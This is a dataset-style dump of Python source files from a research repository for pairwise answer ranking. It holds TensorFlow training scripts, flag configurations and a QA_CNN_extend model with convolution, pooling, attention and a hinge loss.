| repo_name (string, 400 classes) | branch_name (string, 4 classes) | file_content (string, 16-72.5k chars) | language (string, 1 class) | num_lines (int64, 1-1.66k) | avg_line_length (float64, 6-85) | max_line_length (int64, 9-949) | path (string, 5-103 chars) | alphanum_fraction (float64, 0.29-0.89) | alpha_fraction (float64, 0.27-0.89) |
|---|---|---|---|---|---|---|---|---|---|
| shuishen112/pairwise-rnn | refs/heads/master |
import data_helper
import time
import datetime
import os
import tensorflow as tf
import numpy as np
import evaluation
from models.QA_CNN_pairwise import QA_CNN_extend
now = int(time.time())
timeArray = time.localtime(now)
timeStamp = time.strftime("%Y%m%d%H%M%S", timeArray)
timeDay = time.strftime("%Y%m%d", timeArray)
print (timeStamp)
def main(args):
args._parse_flags()
print("\nParameters:")
for attr, value in sorted(args.__flags.items()):
print(("{}={}".format(attr.upper(), value)))
log_dir = 'log/'+ timeDay
if not os.path.exists(log_dir):
os.makedirs(log_dir)
data_file = log_dir + '/test_' + args.data + timeStamp
precision = data_file + 'precise'
print('load data ...........')
train,test,dev = data_helper.load(args.data,filter = args.clean)
q_max_sent_length = max(map(lambda x:len(x),train['question'].str.split()))
a_max_sent_length = max(map(lambda x:len(x),train['answer'].str.split()))
alphabet = data_helper.get_alphabet([train,test,dev])
print('the number of words',len(alphabet))
print('get embedding')
if args.data=="quora":
embedding = data_helper.get_embedding(alphabet,language="cn")
else:
embedding = data_helper.get_embedding(alphabet)
with tf.Graph().as_default(), tf.device("/gpu:" + str(args.gpu)):
# with tf.device("/cpu:0"):
session_conf = tf.ConfigProto()
session_conf.allow_soft_placement = args.allow_soft_placement
session_conf.log_device_placement = args.log_device_placement
session_conf.gpu_options.allow_growth = True
sess = tf.Session(config=session_conf)
# QA_CNN_extend.__init__ takes a single option dict (models.setup() in run.py passes opts the same
# way); learning_rate is included because create_op() reads it when building the Adam optimizer
model = QA_CNN_extend({
'max_input_left': q_max_sent_length,
'max_input_right': a_max_sent_length,
'batch_size': args.batch_size,
'vocab_size': len(alphabet),
'embedding_size': args.embedding_size,
'filter_sizes': list(map(int, args.filter_sizes.split(","))),
'num_filters': args.num_filters,
'hidden_size': args.hidden_size,
'dropout_keep_prob': args.dropout_keep_prob,
'embeddings': embedding,
'l2_reg_lambda': args.l2_reg_lambda,
'learning_rate': args.learning_rate,
'trainable': args.trainable,
'pooling': args.pooling,
'conv': args.conv})
model.build_graph()
sess.run(tf.global_variables_initializer())
def train_step(model,sess,batch):
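# each training batch is the 6-tuple produced by data_helper.get_mini_batch: padded question ids,
# positive answer ids, negative answer ids, followed by the three corresponding 0/1 masks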
for data in batch:
feed_dict = {
model.question:data[0],
model.answer:data[1],
model.answer_negative:data[2],
model.q_mask:data[3],
model.a_mask:data[4],
model.a_neg_mask:data[5],
model.dropout_keep_prob_holder:args.dropout_keep_prob
}
_, summary, step, loss, accuracy,score12, score13, see = sess.run(
[model.train_op, model.merged,model.global_step,model.loss, model.accuracy,model.score12,model.score13, model.see],
feed_dict)
time_str = datetime.datetime.now().isoformat()
print("{}: step {}, loss {:g}, acc {:g} ,positive {:g},negative {:g}".format(time_str, step, loss, accuracy,np.mean(score12),np.mean(score13)))
def predict(model,sess,batch,test):
scores = []
for data in batch:
feed_dict = {
model.question:data[0],
model.answer:data[1],
model.dropout_keep_prob_holder:1.0
}
score = sess.run(
model.score12,
feed_dict)
scores.extend(score)
return np.array(scores[:len(test)])
for i in range(args.num_epoches):
datas = data_helper.get_mini_batch(train,alphabet,args.batch_size)
train_step(model,sess,datas)
test_datas = data_helper.get_mini_batch_test(test,alphabet,args.batch_size)
predicted_test = predict(model,sess,test_datas,test)
print(len(predicted_test))
print(len(test))
map_mrr_test = evaluation.evaluationBypandas(test,predicted_test)
print('map_mrr test',map_mrr_test)
| Python | 116 | 36.043102 | 159 | /main.py | 0.553088 | 0.546842 |
| shuishen112/pairwise-rnn | refs/heads/master |
class Singleton(object):
__instance=None
def __init__(self):
pass
def getInstance(self):
if Singleton.__instance is None:
# Singleton.__instance=object.__new__(cls,*args,**kwd)
Singleton.__instance=self.get_test_flag()
print("build FLAGS over")
return Singleton.__instance
def get_test_flag(self):
import tensorflow as tf
flags = tf.app.flags
if len(flags.FLAGS.__dict__.keys())<=2:
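# a fresh tf.app.flags.FLAGS object only carries a couple of internal attributes, so this length
# check is a crude guard against defining the same flags twice when the method is called again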
flags.DEFINE_integer("embedding_size",300, "Dimensionality of character embedding (default: 128)")
flags.DEFINE_string("filter_sizes", "1,2,3,5", "Comma-separated filter sizes (default: '3,4,5')")
flags.DEFINE_integer("num_filters", 64, "Number of filters per filter size (default: 128)")
flags.DEFINE_float("dropout_keep_prob", 1, "Dropout keep probability (default: 0.5)")
flags.DEFINE_float("l2_reg_lambda", 0.000001, "L2 regularization lambda (default: 0.0)")
flags.DEFINE_float("learning_rate", 5e-3, "learning rate (default: 0.0)")
flags.DEFINE_integer("max_len_left", 40, "max document length of left input")
flags.DEFINE_integer("max_len_right", 40, "max document length of right input")
flags.DEFINE_string("loss","pair_wise","loss function (default:point_wise)")
flags.DEFINE_integer("hidden_size",100,"the default hidden size")
flags.DEFINE_string("model_name", "cnn", "cnn or rnn")
# Training parameters
flags.DEFINE_integer("batch_size", 64, "Batch Size (default: 64)")
flags.DEFINE_boolean("trainable", False, "is embedding trainable? (default: False)")
flags.DEFINE_integer("num_epoches", 1000, "Number of training epochs (default: 200)")
flags.DEFINE_integer("evaluate_every", 500, "Evaluate model on dev set after this many steps (default: 100)")
flags.DEFINE_integer("checkpoint_every", 500, "Save model after this many steps (default: 100)")
flags.DEFINE_string('data','wiki','data set')
flags.DEFINE_string('pooling','max','max pooling or attentive pooling')
flags.DEFINE_boolean('clean',True,'whether we clean the data')
flags.DEFINE_string('conv','wide','wide conv or narrow')
flags.DEFINE_integer('gpu',0,'gpu number')
# Misc Parameters
flags.DEFINE_boolean("allow_soft_placement", True, "Allow device soft device placement")
flags.DEFINE_boolean("log_device_placement", False, "Log placement of ops on devices")
return flags.FLAGS
def get_rnn_flag(self):
import tensorflow as tf
flags = tf.app.flags
if len(flags.FLAGS.__dict__.keys())<=2:
flags.DEFINE_integer("embedding_size",300, "Dimensionality of character embedding (default: 128)")
flags.DEFINE_string("filter_sizes", "1,2,3,5", "Comma-separated filter sizes (default: '3,4,5')")
flags.DEFINE_integer("num_filters", 64, "Number of filters per filter size (default: 128)")
flags.DEFINE_float("dropout_keep_prob", 1, "Dropout keep probability (default: 0.5)")
flags.DEFINE_float("l2_reg_lambda", 0.000001, "L2 regularization lambda (default: 0.0)")
flags.DEFINE_float("learning_rate", 0.001, "learning rate (default: 0.0)")
flags.DEFINE_integer("max_len_left", 40, "max document length of left input")
flags.DEFINE_integer("max_len_right", 40, "max document length of right input")
flags.DEFINE_string("loss","pair_wise","loss function (default:point_wise)")
flags.DEFINE_integer("hidden_size",100,"the default hidden size")
flags.DEFINE_string("model_name", "rnn", "cnn or rnn")
# Training parameters
flags.DEFINE_integer("batch_size", 64, "Batch Size (default: 64)")
flags.DEFINE_boolean("trainable", False, "is embedding trainable? (default: False)")
flags.DEFINE_integer("num_epoches", 1000, "Number of training epochs (default: 200)")
flags.DEFINE_integer("evaluate_every", 500, "Evaluate model on dev set after this many steps (default: 100)")
flags.DEFINE_integer("checkpoint_every", 500, "Save model after this many steps (default: 100)")
# flags.DEFINE_string('data','8008','data set')
flags.DEFINE_string('data','trec','data set')
flags.DEFINE_string('pooling','max','max pooling or attentive pooling')
flags.DEFINE_boolean('clean',False,'whether we clean the data')
flags.DEFINE_string('conv','wide','wide conv or narrow')
flags.DEFINE_integer('gpu',0,'gpu number')
# Misc Parameters
flags.DEFINE_boolean("allow_soft_placement", True, "Allow device soft device placement")
flags.DEFINE_boolean("log_device_placement", False, "Log placement of ops on devices")
return flags.FLAGS
def get_cnn_flag(self):
import tensorflow as tf
flags = tf.app.flags
if len(flags.FLAGS.__dict__.keys())<=2:
flags.DEFINE_integer("embedding_size",300, "Dimensionality of character embedding (default: 128)")
flags.DEFINE_string("filter_sizes", "1,2,3,5", "Comma-separated filter sizes (default: '3,4,5')")
flags.DEFINE_integer("num_filters", 64, "Number of filters per filter size (default: 128)")
flags.DEFINE_float("dropout_keep_prob", 0.8, "Dropout keep probability (default: 0.5)")
flags.DEFINE_float("l2_reg_lambda", 0.000001, "L2 regularization lambda (default: 0.0)")
flags.DEFINE_float("learning_rate", 5e-3, "learning rate (default: 0.0)")
flags.DEFINE_integer("max_len_left", 40, "max document length of left input")
flags.DEFINE_integer("max_len_right", 40, "max document length of right input")
flags.DEFINE_string("loss","pair_wise","loss function (default:point_wise)")
flags.DEFINE_integer("hidden_size",100,"the default hidden size")
flags.DEFINE_string("model_name", "cnn", "cnn or rnn")
# Training parameters
flags.DEFINE_integer("batch_size", 64, "Batch Size (default: 64)")
flags.DEFINE_boolean("trainable", False, "is embedding trainable? (default: False)")
flags.DEFINE_integer("num_epoches", 1000, "Number of training epochs (default: 200)")
flags.DEFINE_integer("evaluate_every", 500, "Evaluate model on dev set after this many steps (default: 100)")
flags.DEFINE_integer("checkpoint_every", 500, "Save model after this many steps (default: 100)")
flags.DEFINE_string('data','wiki','data set')
flags.DEFINE_string('pooling','max','max pooling or attentive pooling')
flags.DEFINE_boolean('clean',True,'whether we clean the data')
flags.DEFINE_string('conv','wide','wide conv or narrow')
flags.DEFINE_integer('gpu',0,'gpu number')
# Misc Parameters
flags.DEFINE_boolean("allow_soft_placement", True, "Allow device soft device placement")
flags.DEFINE_boolean("log_device_placement", False, "Log placement of ops on devices")
return flags.FLAGS
def get_qcnn_flag(self):
import tensorflow as tf
flags = tf.app.flags
if len(flags.FLAGS.__dict__.keys())<=2:
flags.DEFINE_integer("embedding_size",300, "Dimensionality of character embedding (default: 128)")
flags.DEFINE_string("filter_sizes", "1,2,3,5", "Comma-separated filter sizes (default: '3,4,5')")
flags.DEFINE_integer("num_filters", 128, "Number of filters per filter size (default: 128)")
flags.DEFINE_float("dropout_keep_prob", 0.8, "Dropout keep probability (default: 0.5)")
flags.DEFINE_float("l2_reg_lambda", 0.000001, "L2 regularization lambda (default: 0.0)")
flags.DEFINE_float("learning_rate", 0.001, "learning rate (default: 0.0)")
flags.DEFINE_integer("max_len_left", 40, "max document length of left input")
flags.DEFINE_integer("max_len_right", 40, "max document length of right input")
flags.DEFINE_string("loss","pair_wise","loss function (default:point_wise)")
flags.DEFINE_integer("hidden_size",100,"the default hidden size")
flags.DEFINE_string("model_name", "qcnn", "cnn or rnn")
# Training parameters
flags.DEFINE_integer("batch_size", 64, "Batch Size (default: 64)")
flags.DEFINE_boolean("trainable", False, "is embedding trainable? (default: False)")
flags.DEFINE_integer("num_epoches", 1000, "Number of training epochs (default: 200)")
flags.DEFINE_integer("evaluate_every", 500, "Evaluate model on dev set after this many steps (default: 100)")
flags.DEFINE_integer("checkpoint_every", 500, "Save model after this many steps (default: 100)")
flags.DEFINE_string('data','wiki','data set')
flags.DEFINE_string('pooling','mean','max pooling or attentive pooling')
flags.DEFINE_boolean('clean',True,'whether we clean the data')
flags.DEFINE_string('conv','wide','wide conv or narrow')
flags.DEFINE_integer('gpu',0,'gpu number')
# Misc Parameters
flags.DEFINE_boolean("allow_soft_placement", True, "Allow device soft device placement")
flags.DEFINE_boolean("log_device_placement", False, "Log placement of ops on devices")
return flags.FLAGS
def get_8008_flag(self):
import tensorflow as tf
flags = tf.app.flags
if len(flags.FLAGS.__dict__.keys())<=2:
flags.DEFINE_integer("embedding_size",200, "Dimensionality of character embedding (default: 128)")
flags.DEFINE_string("filter_sizes", "1,2,3,5", "Comma-separated filter sizes (default: '3,4,5')")
flags.DEFINE_integer("num_filters", 64, "Number of filters per filter size (default: 128)")
flags.DEFINE_float("dropout_keep_prob", 0.8, "Dropout keep probability (default: 0.5)")
flags.DEFINE_float("l2_reg_lambda", 0.000001, "L2 regularization lambda (default: 0.0)")
flags.DEFINE_float("learning_rate", 1e-3, "learning rate (default: 0.0)")
flags.DEFINE_integer("max_len_left", 40, "max document length of left input")
flags.DEFINE_integer("max_len_right", 40, "max document length of right input")
flags.DEFINE_string("loss","pair_wise","loss function (default:point_wise)")
flags.DEFINE_integer("hidden_size",100,"the default hidden size")
flags.DEFINE_string("model_name", "rnn", "cnn or rnn")
# Training parameters
flags.DEFINE_integer("batch_size", 250, "Batch Size (default: 64)")
flags.DEFINE_boolean("trainable", False, "is embedding trainable? (default: False)")
flags.DEFINE_integer("num_epoches", 1000, "Number of training epochs (default: 200)")
flags.DEFINE_integer("evaluate_every", 500, "Evaluate model on dev set after this many steps (default: 100)")
flags.DEFINE_integer("checkpoint_every", 500, "Save model after this many steps (default: 100)")
flags.DEFINE_string('data','8008','data set')
flags.DEFINE_string('pooling','max','max pooling or attentive pooling')
flags.DEFINE_boolean('clean',False,'whether we clean the data')
flags.DEFINE_string('conv','wide','wide conv or narrow')
flags.DEFINE_integer('gpu',0,'gpu number')
# Misc Parameters
flags.DEFINE_boolean("allow_soft_placement", True, "Allow device soft device placement")
flags.DEFINE_boolean("log_device_placement", False, "Log placement of ops on devices")
return flags.FLAGS
if __name__=="__main__":
args=Singleton().get_test_flag()
for attr, value in sorted(args.__flags.items()):
print(("{}={}".format(attr.upper(), value)))
| Python | 197 | 60.426395 | 121 | /config.py | 0.627396 | 0.597571 |
| shuishen112/pairwise-rnn | refs/heads/master |
from tensorflow import flags
import tensorflow as tf
from config import Singleton
import data_helper
import datetime,os
import models
import numpy as np
import evaluation
import sys
import logging
import time
now = int(time.time())
timeArray = time.localtime(now)
timeStamp = time.strftime("%Y%m%d%H%M%S", timeArray)
log_filename = "log/" +time.strftime("%Y%m%d", timeArray)
program = os.path.basename(sys.argv[0])
logger = logging.getLogger(program)
if not os.path.exists(log_filename):
os.makedirs(log_filename)
logging.basicConfig(format='%(asctime)s: %(levelname)s: %(message)s',datefmt='%a, %d %b %Y %H:%M:%S',filename=log_filename+'/qa.log',filemode='w')
logging.root.setLevel(level=logging.INFO)
logger.info("running %s" % ' '.join(sys.argv))
from data_helper import log_time_delta,getLogger
logger=getLogger()
args = Singleton().get_qcnn_flag()
args._parse_flags()
opts=dict()
logger.info("\nParameters:")
for attr, value in sorted(args.__flags.items()):
logger.info(("{}={}".format(attr.upper(), value)))
opts[attr]=value
train,test,dev = data_helper.load(args.data,filter = args.clean)
q_max_sent_length = max(map(lambda x:len(x),train['question'].str.split()))
a_max_sent_length = max(map(lambda x:len(x),train['answer'].str.split()))
alphabet = data_helper.get_alphabet([train,test,dev],dataset=args.data )
logger.info('the number of words :%d '%len(alphabet))
if args.data=="quora" or args.data=="8008" :
print("cn embedding")
embedding = data_helper.get_embedding(alphabet,dim=200,language="cn",dataset=args.data )
train_data_loader = data_helper.getBatch48008
else:
embedding = data_helper.get_embedding(alphabet,dim=300,dataset=args.data )
train_data_loader = data_helper.get_mini_batch
opts["embeddings"] =embedding
opts["vocab_size"]=len(alphabet)
opts["max_input_right"]=a_max_sent_length
opts["max_input_left"]=q_max_sent_length
opts["filter_sizes"]=list(map(int, args.filter_sizes.split(",")))
print("initialization done")
#with tf.Graph().as_default(), tf.device("/gpu:" + str(args.gpu)):
with tf.Graph().as_default():
# with tf.device("/cpu:0"):
session_conf = tf.ConfigProto()
session_conf.allow_soft_placement = args.allow_soft_placement
session_conf.log_device_placement = args.log_device_placement
session_conf.gpu_options.allow_growth = True
sess = tf.Session(config=session_conf)
model=models.setup(opts)
model.build_graph()
saver = tf.train.Saver()
# ckpt = tf.train.get_checkpoint_state("checkpoint")
# if ckpt and ckpt.model_checkpoint_path:
# # Restores from checkpoint
# saver.restore(sess, ckpt.model_checkpoint_path)
# if os.path.exists("model") :
# import shutil
# shutil.rmtree("model")
# builder = tf.saved_model.builder.SavedModelBuilder("./model")
# builder.add_meta_graph_and_variables(sess, [tf.saved_model.tag_constants.SERVING])
# builder.save(True)
# variable_averages = tf.train.ExponentialMovingAverage( model)
# variables_to_restore = variable_averages.variables_to_restore()
# saver = tf.train.Saver(variables_to_restore)
# for name in variables_to_restore:
# print(name)
sess.run(tf.global_variables_initializer())
@log_time_delta
def predict(model,sess,batch,test):
scores = []
for data in batch:
score = model.predict(sess,data)
scores.extend(score)
return np.array(scores[:len(test)])
best_p1=0
for i in range(args.num_epoches):
for data in train_data_loader(train,alphabet,args.batch_size,model=model,sess=sess):
# for data in data_helper.getBatch48008(train,alphabet,args.batch_size):
_, summary, step, loss, accuracy,score12, score13, see = model.train(sess,data)
time_str = datetime.datetime.now().isoformat()
print("{}: step {}, loss {:g}, acc {:g} ,positive {:g},negative {:g}".format(time_str, step, loss, accuracy,np.mean(score12),np.mean(score13)))
logger.info("{}: step {}, loss {:g}, acc {:g} ,positive {:g},negative {:g}".format(time_str, step, loss, accuracy,np.mean(score12),np.mean(score13)))
#<<<<<<< HEAD
#
#
# if i>0 and i % 5 ==0:
# test_datas = data_helper.get_mini_batch_test(test,alphabet,args.batch_size)
#
# predicted_test = predict(model,sess,test_datas,test)
# map_mrr_test = evaluation.evaluationBypandas(test,predicted_test)
#
# logger.info('map_mrr test' +str(map_mrr_test))
# print('map_mrr test' +str(map_mrr_test))
#
# test_datas = data_helper.get_mini_batch_test(dev,alphabet,args.batch_size)
# predicted_test = predict(model,sess,test_datas,dev)
# map_mrr_test = evaluation.evaluationBypandas(dev,predicted_test)
#
# logger.info('map_mrr dev' +str(map_mrr_test))
# print('map_mrr dev' +str(map_mrr_test))
# map,mrr,p1 = map_mrr_test
# if p1>best_p1:
# best_p1=p1
# filename= "checkpoint/"+args.data+"_"+str(p1)+".model"
# save_path = saver.save(sess, filename)
# # load_path = saver.restore(sess, model_path)
#
# import shutil
# shutil.rmtree("model")
# builder = tf.saved_model.builder.SavedModelBuilder("./model")
# builder.add_meta_graph_and_variables(sess, [tf.saved_model.tag_constants.SERVING])
# builder.save(True)
#
#
#=======
test_datas = data_helper.get_mini_batch_test(test,alphabet,args.batch_size)
predicted_test = predict(model,sess,test_datas,test)
map_mrr_test = evaluation.evaluationBypandas(test,predicted_test)
logger.info('map_mrr test' +str(map_mrr_test))
print('epoch '+ str(i) + 'map_mrr test' +str(map_mrr_test))
| Python | 164 | 35.829269 | 161 | /run.py | 0.628704 | 0.62142 |
| shuishen112/pairwise-rnn | refs/heads/master |
#coding:utf-8
import tensorflow as tf
import numpy as np
from tensorflow.contrib import rnn
import models.blocks as blocks
# model_type :apn or qacnn
class QA_CNN_extend(object):
# def __init__(self,max_input_left,max_input_right,batch_size,vocab_size,embedding_size,filter_sizes,num_filters,hidden_size,
# dropout_keep_prob = 1,learning_rate = 0.001,embeddings = None,l2_reg_lambda = 0.0,trainable = True,pooling = 'attentive',conv = 'narrow'):
#
# """
# QA_RNN model for question answering
#
# Args:
# self.dropout_keep_prob: dropout rate
# self.num_filters : number of filters
# self.para : parameter list
# self.extend_feature_dim : my extend feature dimension
# self.max_input_left : the length of question
# self.max_input_right : the length of answer
# self.pooling : pooling strategy :max pooling or attentive pooling
#
# """
# self.dropout_keep_prob = tf.placeholder(tf.float32,name = 'dropout_keep_prob')
# self.num_filters = num_filters
# self.embeddings = embeddings
# self.embedding_size = embedding_size
# self.batch_size = batch_size
# self.filter_sizes = filter_sizes
# self.l2_reg_lambda = l2_reg_lambda
# self.para = []
#
# self.max_input_left = max_input_left
# self.max_input_right = max_input_right
# self.trainable = trainable
# self.vocab_size = vocab_size
# self.pooling = pooling
# self.total_num_filter = len(self.filter_sizes) * self.num_filters
#
# self.conv = conv
# self.pooling = 'traditional'
# self.learning_rate = learning_rate
#
# self.hidden_size = hidden_size
#
# self.attention_size = 100
def __init__(self,opt):
for key,value in opt.items():
self.__setattr__(key,value)
self.attention_size = 100
self.pooling = 'mean'
self.total_num_filter = len(self.filter_sizes) * self.num_filters
self.para = []
self.dropout_keep_prob_holder = tf.placeholder(tf.float32,name = 'dropout_keep_prob')
def create_placeholder(self):
print(('Create placeholders'))
# the sentence length varies from batch to batch, so both dimensions are left as None
self.question = tf.placeholder(tf.int32,[None,None],name = 'input_question')
self.max_input_left = tf.shape(self.question)[1]
self.batch_size = tf.shape(self.question)[0]
self.answer = tf.placeholder(tf.int32,[None,None],name = 'input_answer')
self.max_input_right = tf.shape(self.answer)[1]
self.answer_negative = tf.placeholder(tf.int32,[None,None],name = 'input_right')
# self.q_mask = tf.placeholder(tf.int32,[None,None],name = 'q_mask')
# self.a_mask = tf.placeholder(tf.int32,[None,None],name = 'a_mask')
# self.a_neg_mask = tf.placeholder(tf.int32,[None,None],name = 'a_neg_mask')
def add_embeddings(self):
print( 'add embeddings')
if self.embeddings is not None:
print( "load embedding")
W = tf.Variable(np.array(self.embeddings),name = "W" ,dtype="float32",trainable = self.trainable)
else:
print( "random embedding")
W = tf.Variable(tf.random_uniform([self.vocab_size, self.embedding_size], -1.0, 1.0),name="W",trainable = self.trainable)
self.embedding_W = W
# self.overlap_W = tf.Variable(a,name="W",trainable = True)
self.para.append(self.embedding_W)
self.q_embedding = tf.nn.embedding_lookup(self.embedding_W,self.question)
self.a_embedding = tf.nn.embedding_lookup(self.embedding_W,self.answer)
self.a_neg_embedding = tf.nn.embedding_lookup(self.embedding_W,self.answer_negative)
#real length
self.q_len,self.q_mask = blocks.length(self.question)
self.a_len,self.a_mask = blocks.length(self.answer)
self.a_neg_len,self.a_neg_mask = blocks.length(self.answer_negative)
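# blocks.length (models/blocks.py, not shown here) presumably derives the real sequence length
# and a float mask from the padded id matrix, so the masks no longer have to be fed in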
def convolution(self):
print( 'convolution:wide_convolution')
self.kernels = []
for i,filter_size in enumerate(self.filter_sizes):
with tf.name_scope('conv-max-pool-%s' % filter_size):
filter_shape = [filter_size,self.embedding_size,1,self.num_filters]
W = tf.Variable(tf.truncated_normal(filter_shape, stddev = 0.1), name="W")
b = tf.Variable(tf.constant(0.0, shape=[self.num_filters]), name="b")
self.kernels.append((W,b))
self.para.append(W)
self.para.append(b)
embeddings = [self.q_embedding,self.a_embedding,self.a_neg_embedding]
self.q_cnn,self.a_cnn,self.a_neg_cnn = [self.wide_convolution(tf.expand_dims(embedding,-1)) for embedding in embeddings]
#convolution
def pooling_graph(self):
if self.pooling == 'mean':
self.q_pos_cnn = self.mean_pooling(self.q_cnn,self.q_mask)
self.q_neg_cnn = self.mean_pooling(self.q_cnn,self.q_mask)
self.a_pos_cnn = self.mean_pooling(self.a_cnn,self.a_mask)
self.a_neg_cnn = self.mean_pooling(self.a_neg_cnn,self.a_neg_mask)
elif self.pooling == 'attentive':
self.q_pos_cnn,self.a_pos_cnn = self.attentive_pooling(self.q_cnn,self.a_cnn,self.q_mask,self.a_mask)
self.q_neg_cnn,self.a_neg_cnn = self.attentive_pooling(self.q_cnn,self.a_neg_cnn,self.q_mask,self.a_neg_mask)
elif self.pooling == 'position':
self.q_pos_cnn,self.a_pos_cnn = self.position_attention(self.q_cnn,self.a_cnn,self.q_mask,self.a_mask)
self.q_neg_cnn,self.a_neg_cnn = self.position_attention(self.q_cnn,self.a_neg_cnn,self.q_mask,self.a_neg_mask)
elif self.pooling == 'traditional':
print( self.pooling)
print(self.q_cnn)
self.q_pos_cnn,self.a_pos_cnn = self.traditional_attention(self.q_cnn,self.a_cnn,self.q_mask,self.a_mask)
self.q_neg_cnn,self.a_neg_cnn = self.traditional_attention(self.q_cnn,self.a_neg_cnn,self.q_mask,self.a_neg_mask)
def para_initial(self):
# print(("---------"))
# self.W_qp = tf.Variable(tf.truncated_normal(shape = [self.hidden_size * 2,1],stddev = 0.01,name = 'W_qp'))
self.U = tf.Variable(tf.truncated_normal(shape = [self.total_num_filter,self.total_num_filter],stddev = 0.01,name = 'U'))
self.W_hm = tf.Variable(tf.truncated_normal(shape = [self.total_num_filter,self.total_num_filter],stddev = 0.01,name = 'W_hm'))
self.W_qm = tf.Variable(tf.truncated_normal(shape = [self.total_num_filter,self.total_num_filter],stddev = 0.01,name = 'W_qm'))
self.W_ms = tf.Variable(tf.truncated_normal(shape = [self.total_num_filter,1],stddev = 0.01,name = 'W_ms'))
self.M_qi = tf.Variable(tf.truncated_normal(shape = [self.total_num_filter,self.embedding_size],stddev = 0.01,name = 'M_qi'))
def mean_pooling(self,conv,mask):
conv = tf.squeeze(conv,2)
# keep a masked copy around so that self.see (fetched by train()) also exists for mean pooling
conv_mask = tf.multiply(conv,tf.expand_dims(tf.cast(mask,tf.float32),-1))
self.see = conv_mask
return tf.reduce_mean(conv,axis = 1)
def attentive_pooling(self,input_left,input_right,q_mask,a_mask):
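# attentive pooling in the spirit of Attentive Pooling Networks: build G = tanh(Q U A^T),
# max-pool G along each axis to get attention weights over question and answer positions,
# mask them, and return the attention-weighted representations R_q and R_a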
Q = tf.squeeze(input_left,axis = 2)
A = tf.squeeze(input_right,axis = 2)
print( Q)
print( A)
# Q = tf.reshape(input_left,[-1,self.max_input_left,len(self.filter_sizes) * self.num_filters],name = 'Q')
# A = tf.reshape(input_right,[-1,self.max_input_right,len(self.filter_sizes) * self.num_filters],name = 'A')
# G = tf.tanh(tf.matmul(tf.matmul(Q,self.U),\
# A,transpose_b = True),name = 'G')
first = tf.matmul(tf.reshape(Q,[-1,len(self.filter_sizes) * self.num_filters]),self.U)
second_step = tf.reshape(first,[-1,self.max_input_left,len(self.filter_sizes) * self.num_filters])
result = tf.matmul(second_step,tf.transpose(A,perm = [0,2,1]))
print( second_step)
print( tf.transpose(A,perm = [0,2,1]))
# print( 'result',result)
G = tf.tanh(result)
# G = result
# column-wise pooling ,row-wise pooling
row_pooling = tf.reduce_max(G,1,True,name = 'row_pooling')
col_pooling = tf.reduce_max(G,2,True,name = 'col_pooling')
self.attention_q = tf.nn.softmax(col_pooling,1,name = 'attention_q')
self.attention_q_mask = tf.multiply(self.attention_q,tf.expand_dims(tf.cast(q_mask,tf.float32),-1))
self.attention_a = tf.nn.softmax(row_pooling,name = 'attention_a')
self.attention_a_mask = tf.multiply(self.attention_a,tf.expand_dims(tf.cast(a_mask,tf.float32),1))
self.see = G
R_q = tf.reshape(tf.matmul(Q,self.attention_q_mask,transpose_a = 1),[-1,self.num_filters * len(self.filter_sizes)],name = 'R_q')
R_a = tf.reshape(tf.matmul(self.attention_a_mask,A),[-1,self.num_filters * len(self.filter_sizes)],name = 'R_a')
return R_q,R_a
def traditional_attention(self,input_left,input_right,q_mask,a_mask):
input_left = tf.squeeze(input_left,axis = 2)
input_right = tf.squeeze(input_right,axis = 2)
input_left_mask = tf.multiply(input_left, tf.expand_dims(tf.cast(q_mask,tf.float32),2))
Q = tf.reduce_mean(input_left_mask,1)
a_shape = tf.shape(input_right)
A = tf.reshape(input_right,[-1,self.total_num_filter])
m_t = tf.nn.tanh(tf.reshape(tf.matmul(A,self.W_hm),[-1,a_shape[1],self.total_num_filter]) + tf.expand_dims(tf.matmul(Q,self.W_qm),1))
f_attention = tf.exp(tf.reshape(tf.matmul(tf.reshape(m_t,[-1,self.total_num_filter]),self.W_ms),[-1,a_shape[1],1]))
self.f_attention_mask = tf.multiply(f_attention,tf.expand_dims(tf.cast(a_mask,tf.float32),2))
self.f_attention_norm = tf.divide(self.f_attention_mask,tf.reduce_sum(self.f_attention_mask,1,keep_dims = True))
self.see = self.f_attention_norm
a_attention = tf.reduce_sum(tf.multiply(input_right,self.f_attention_norm),1)
return Q,a_attention
def position_attention(self,input_left,input_right,q_mask,a_mask):
input_left = tf.squeeze(input_left,axis = 2)
input_right = tf.squeeze(input_right,axis = 2)
# Q = tf.reshape(input_left,[-1,self.max_input_left,self.hidden_size*2],name = 'Q')
# A = tf.reshape(input_right,[-1,self.max_input_right,self.hidden_size*2],name = 'A')
Q = tf.reduce_mean(tf.multiply(input_left,tf.expand_dims(tf.cast(self.q_mask,tf.float32),2)),1)
QU = tf.matmul(Q,self.U)
QUA = tf.multiply(tf.expand_dims(QU,1),input_right)
self.attention_a = tf.cast(tf.argmax(QUA,2),tf.float32)
# q_shape = tf.shape(input_left)
# Q_1 = tf.reshape(input_left,[-1,self.total_num_filter])
# QU = tf.matmul(Q_1,self.U)
# QU_1 = tf.reshape(QU,[-1,q_shape[1],self.total_num_filter])
# A_1 = tf.transpose(input_right,[0,2,1])
# QUA = tf.matmul(QU_1,A_1)
# QUA = tf.nn.l2_normalize(QUA,1)
# G = tf.tanh(QUA)
# Q = tf.reduce_mean(tf.multiply(input_left,tf.expand_dims(tf.cast(self.q_mask,tf.float32),2)),1)
# # self.Q_mask = tf.multiply(input_left,tf.expand_dims(tf.cast(self.q_mask,tf.float32),2))
# row_pooling = tf.reduce_max(G,1,name="row_pooling")
# col_pooling = tf.reduce_max(G,2,name="col_pooling")
# self.attention_a = tf.nn.softmax(row_pooling,1,name = "attention_a")
self.attention_a_mask = tf.multiply(self.attention_a,tf.cast(a_mask,tf.float32))
self.see = self.attention_a
self.attention_a_norm = tf.divide(self.attention_a_mask,tf.reduce_sum(self.attention_a_mask,1,keep_dims =True))
self.r_a = tf.reshape(tf.matmul(tf.transpose(input_right,[0,2,1]) ,tf.expand_dims(self.attention_a_norm,2)),[-1,self.total_num_filter])
return Q ,self.r_a
def create_loss(self):
with tf.name_scope('score'):
self.score12 = self.getCosine(self.q_pos_cnn,self.a_pos_cnn)
self.score13 = self.getCosine(self.q_neg_cnn,self.a_neg_cnn)
l2_loss = tf.constant(0.0)
for p in self.para:
l2_loss += tf.nn.l2_loss(p)
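# pairwise hinge loss: penalise a pair whenever the positive cosine score does not beat the
# negative one by a margin of 0.05, i.e. max(0, 0.05 - (score_pos - score_neg))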
with tf.name_scope("loss"):
self.losses = tf.maximum(0.0, tf.subtract(0.05, tf.subtract(self.score12, self.score13)))
self.loss = tf.reduce_sum(self.losses) + self.l2_reg_lambda * l2_loss
tf.summary.scalar('loss', self.loss)
# Accuracy
with tf.name_scope("accuracy"):
